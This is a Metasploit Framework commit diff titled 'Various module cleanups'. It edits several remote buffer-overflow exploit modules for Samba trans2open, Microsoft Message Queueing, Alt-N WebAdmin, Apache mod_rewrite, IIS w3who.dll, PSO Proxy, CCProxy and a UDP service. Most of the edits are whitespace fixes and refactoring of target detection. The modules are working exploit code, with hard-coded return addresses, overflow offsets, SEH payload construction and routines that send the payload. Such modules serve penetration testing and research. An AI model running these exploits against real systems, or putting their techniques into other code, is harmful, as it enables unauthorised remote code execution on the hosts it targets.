Various module cleanups
git-svn-id: file:///home/svn/framework3/trunk@8498 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f9ae031055
commit
5d7139ad6f
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba trans2open Overflow (Mac OS X)',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in Samba versions
|
||||
2.2.0 to 2.2.8. This particular module is capable of
|
||||
exploiting the bug on Mac OS X PowerPC systems.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
|
@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2003-0201'],
|
||||
[ 'OSVDB', '4469'],
|
||||
[ 'BID', '7294'],
|
||||
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
|
||||
[ 'BID', '7294']
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
@ -47,14 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC,
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
|
||||
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2003',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(139)
|
||||
|
@ -75,10 +74,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
|
||||
# 1988 is required for findrecv shellcode
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
||||
|
||||
|
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put(trans)
|
||||
handler
|
||||
disconnect
|
||||
|
||||
|
||||
rescue EOFError
|
||||
rescue => e
|
||||
print_status("Caught exception: #{e}")
|
||||
|
@ -107,3 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -101,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
||||
# Need to perform target detection
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def brute_exploit(target_addrs)
|
||||
|
||||
if(not @nops)
|
||||
|
@ -221,3 +221,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Message Queueing Service Path Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the RPC interface
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
hostname, so this must be provided via the 'HNAME' option.
|
||||
Much thanks to snort.org and Jean-Baptiste Marchand's
|
||||
excellent MSRPC website.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
|
||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Apr 12 2005',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
# Change the default port values to point at MSMQ
|
||||
register_options(
|
||||
[
|
||||
|
@ -74,21 +74,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Common vulnerability scanning tools report port 445/139
|
||||
# due to how they test for the vulnerability. Remap this
|
||||
# back to 2103 for automated exploitation
|
||||
|
||||
|
||||
rport = datastore['RPORT'].to_i
|
||||
if ( rport == 2103 or rport == 2103 )
|
||||
if ( rport == 445 or rport == 139 )
|
||||
datastore['RPORT'] = 2103
|
||||
end
|
||||
|
||||
|
||||
# The NetBIOS hostname is required to exploit this bug reliably.
|
||||
if (not datastore['HNAME'])
|
||||
# XXX automatically determine the hostname
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
# MSMQ supports three forms of queue names, the two we can use are
|
||||
|
@ -121,13 +121,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
connect
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
|
||||
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
stubdata =
|
||||
stubdata =
|
||||
NDR.long(1) +
|
||||
NDR.long(1) +
|
||||
NDR.long(1) +
|
||||
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
|
||||
|
||||
print_status('Sending exploit ...')
|
||||
|
||||
|
||||
response = dcerpc.call(9, stubdata)
|
||||
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
|
@ -157,3 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -20,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Message Queueing Service DNS Name Path Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the RPC interface
|
||||
to the Microsoft Message Queueing service. This exploit requires
|
||||
the target system to have been configured with a DNS name and
|
||||
for that name to be supplied in the 'DNAME' option. This name does
|
||||
not need to be served by a valid DNS server, only configured on
|
||||
not need to be served by a valid DNS server, only configured on
|
||||
the target machine.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '39123'],
|
||||
[ 'MSB', 'MS07-065'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
|
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows 2000 Server English',
|
||||
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Dec 11 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
# Change the default port values to point at MSMQ
|
||||
register_options(
|
||||
[
|
||||
|
@ -73,65 +73,65 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Common vulnerability scanning tools report port 445/139
|
||||
# due to how they test for the vulnerability. Remap this
|
||||
# back to 2103 for automated exploitation
|
||||
|
||||
|
||||
rport = datastore['RPORT'].to_i
|
||||
if ( rport == 2103 or rport == 2103 )
|
||||
if ( rport == 445 or rport == 139 )
|
||||
datastore['RPORT'] = 2103
|
||||
end
|
||||
|
||||
|
||||
# The NetBIOS hostname is required to exploit this bug
|
||||
if (not datastore['DNAME'])
|
||||
# XXX automatically determine the hostname
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
|
||||
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
dname = datastore['DNAME']
|
||||
|
||||
|
||||
boom = rand_text_alphanumeric(4096)
|
||||
|
||||
|
||||
hname,domain = dname.split(".")
|
||||
|
||||
|
||||
if(not domain)
|
||||
print_status("The DNAME parameter specified is not valid.")
|
||||
print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
off = 310 - (hname.length * 2)
|
||||
|
||||
|
||||
seh = generate_seh_payload(target.ret)
|
||||
boom[off, seh.length] = seh
|
||||
|
||||
|
||||
buff = Rex::Text.to_unicode("#{dname}\\")
|
||||
buff << boom
|
||||
buff << "\x00\x00"
|
||||
|
||||
|
||||
# Data alignment
|
||||
while(buff.length % 4 != 0)
|
||||
buff << "\x00"
|
||||
end
|
||||
|
||||
stubdata =
|
||||
|
||||
stubdata =
|
||||
NDR.long(1) + # [in] long arg_1,
|
||||
NDR.UnicodeConformantVaryingStringPreBuilt(buff) + # [in][string] wchar_t * arg_2,
|
||||
NDR.long(0) * 5 # ... fields we can ignore
|
||||
|
||||
print_status('Sending exploit...')
|
||||
|
||||
begin
|
||||
begin
|
||||
response = dcerpc.call(6, stubdata)
|
||||
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
|
@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Error: The wrong value has been supplied for the DNAME parameter")
|
||||
print_status("This value must be the fully-qualified domain name of the target")
|
||||
print_status("Many systems have no FQDN configured and cannot be exploited")
|
||||
else
|
||||
else
|
||||
print_status("An unknown response was received from the server:")
|
||||
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
|
||||
end
|
||||
|
@ -148,9 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
print_status("No response from the DCERPC service (this is usually a good thing).")
|
||||
end
|
||||
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Alt-N WebAdmin is prone to a buffer overflow condition. This
|
||||
|
@ -51,51 +51,52 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', {}],
|
||||
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
|
||||
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
|
||||
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
|
||||
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
|
||||
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 24 2003'))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(1000)], self.class)
|
||||
end
|
||||
|
||||
# Identify the target based on the WebAdmin version number
|
||||
def autofilter
|
||||
res = send_request_raw({
|
||||
'uri' => '/WebAdmin.DLL'
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
||||
case $1
|
||||
when /2\.0\.4/
|
||||
datastore['TARGET'] = 0
|
||||
when /2\.0\.3/
|
||||
datastore['TARGET'] = 1
|
||||
when /2\.0\.2/
|
||||
datastore['TARGET'] = 2
|
||||
when /2\.0\.1/
|
||||
datastore['TARGET'] = 3
|
||||
else
|
||||
return false
|
||||
end
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
# Not vulnerable
|
||||
return false
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = target
|
||||
|
||||
if (target.name =~ /Automatic/)
|
||||
res = send_request_raw({
|
||||
'uri' => '/WebAdmin.DLL'
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
||||
case $1
|
||||
when /2\.0\.4/
|
||||
mytarget = targets[1]
|
||||
when /2\.0\.3/
|
||||
mytarget = targets[2]
|
||||
when /2\.0\.2/
|
||||
mytarget = targets[3]
|
||||
when /2\.0\.1/
|
||||
mytarget = targets[4]
|
||||
else
|
||||
print_error("No target found for v#{$1}")
|
||||
return
|
||||
end
|
||||
else
|
||||
print_error("No target found")
|
||||
end
|
||||
end
|
||||
|
||||
user_cook = rand_text_alphanumeric(2)
|
||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||
post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
|
||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||
|
||||
|
||||
print_status("Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/WebAdmin.DLL',
|
||||
|
@ -104,15 +105,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
|
||||
'data' => post_data,
|
||||
'headers' =>
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
|
||||
'Accept-Language' => 'en',
|
||||
'Accept-Charset' => 'iso-8859-1,*,utf-8'
|
||||
}
|
||||
}, 5)
|
||||
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the mod_rewrite LDAP protocol scheme handling
|
||||
|
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
|
||||
This module requires REWRITEPATH to be set accurately. In addition,
|
||||
the target must have 'RewriteEngine on' configured, with a specific
|
||||
'RewriteRule' condition enabled to allow for exploitation.
|
||||
|
||||
'RewriteRule' condition enabled to allow for exploitation.
|
||||
|
||||
The flaw affects multiple platforms, however this module currently
|
||||
only supports Windows based installations.
|
||||
},
|
||||
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ], # patrickw tested OK 20090310 win32
|
||||
],
|
||||
|
@ -69,16 +69,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => '/',
|
||||
'version' => '1.1',
|
||||
}, 2)
|
||||
'uri' => '/',
|
||||
'version' => '1.1',
|
||||
}, 2)
|
||||
|
||||
if (res.to_s =~ /Apache/) # This could be smarter.
|
||||
return Exploit::CheckCode::Detected
|
||||
|
@ -88,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
|
||||
# On Linux Apache, it is possible to overwrite EIP by
|
||||
# sending ldap://<buf> ... TODO patrickw
|
||||
|
||||
|
||||
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
|
||||
|
||||
print_status("Sending payload.")
|
||||
|
@ -102,3 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
handler
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -70,10 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
|
||||
|
@ -120,4 +116,5 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def wfs_delay
|
||||
25
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Feb 20 2004',
|
||||
'DefaultTarget' => 0))
|
||||
'DisclosureDate' => 'Feb 20 2004'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
@ -63,29 +63,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
banner = sock.get(-1,3)
|
||||
if (banner =~ /PSO Proxy 0\.9/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
exploit = rand_text_alphanumeric(1024, payload_badchars)
|
||||
exploit += [target['Ret']].pack('V') + payload.encoded
|
||||
|
||||
sock.put(exploit + "\r\n\r\n")
|
||||
|
||||
disconnect
|
||||
handler
|
||||
def check
|
||||
connect
|
||||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
banner = sock.get(-1,3)
|
||||
if (banner =~ /PSO Proxy 0\.9/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
exploit = rand_text_alphanumeric(1024, payload_badchars)
|
||||
exploit += [target['Ret']].pack('V') + payload.encoded
|
||||
|
||||
sock.put(exploit + "\r\n\r\n")
|
||||
|
||||
disconnect
|
||||
handler
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the w3who.dll ISAPI
|
||||
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Windows 2000 and Windows XP (SP2). When exploiting Windows
|
||||
XP, the payload must call RevertToSelf before it will be
|
||||
able to spawn a command shell.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -55,61 +55,61 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Detection', { }],
|
||||
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
|
||||
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 6 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Identify the target based on the IIS version
|
||||
def autofilter
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
datastore['TARGET'] = 1
|
||||
else
|
||||
datastore['TARGET'] = 0
|
||||
end
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
# Not vulnerable
|
||||
return false
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
|
||||
if (res and res.body =~ /Access Token/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = target
|
||||
|
||||
if(mytarget.name =~ /Automatic/)
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
mytarget = targets[2]
|
||||
else
|
||||
mytarget = targets[1]
|
||||
end
|
||||
else
|
||||
print_error("No valid target found")
|
||||
end
|
||||
end
|
||||
|
||||
buf = rand_text_english(8192, payload_badchars)
|
||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
|
||||
buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
print_status("Sending request...")
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
|
@ -120,3 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,10 +3,10 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
@ -14,11 +14,11 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite
|
||||
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
long address to the 'ping' command.
|
||||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
@ -35,14 +35,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'OSVDB', '11593' ],
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'URL', 'http://milw0rm.com/exploits/621' ],
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
{
|
||||
'Space' => 1012,
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
|
||||
},
|
||||
|
@ -57,31 +57,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
|
||||
],
|
||||
'DisclosureDate' => 'Nov 11 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check
|
||||
def check
|
||||
connect
|
||||
banner = sock.get_once(-1,3)
|
||||
disconnect
|
||||
|
||||
if (banner =~ /CCProxy Telnet Service Ready/)
|
||||
return Exploit::CheckCode::Appears
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
|
||||
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
|
||||
sock.put(sploit + "\r\n")
|
||||
|
||||
|
@ -90,3 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6184'],
|
||||
['OSVDB', '11350'],
|
||||
['BID', '21320'],
|
||||
|
@ -68,22 +68,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect_udp
|
||||
|
||||
|
||||
sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
|
||||
sploit << payload.encoded
|
||||
sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it.
|
||||
sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn
|
||||
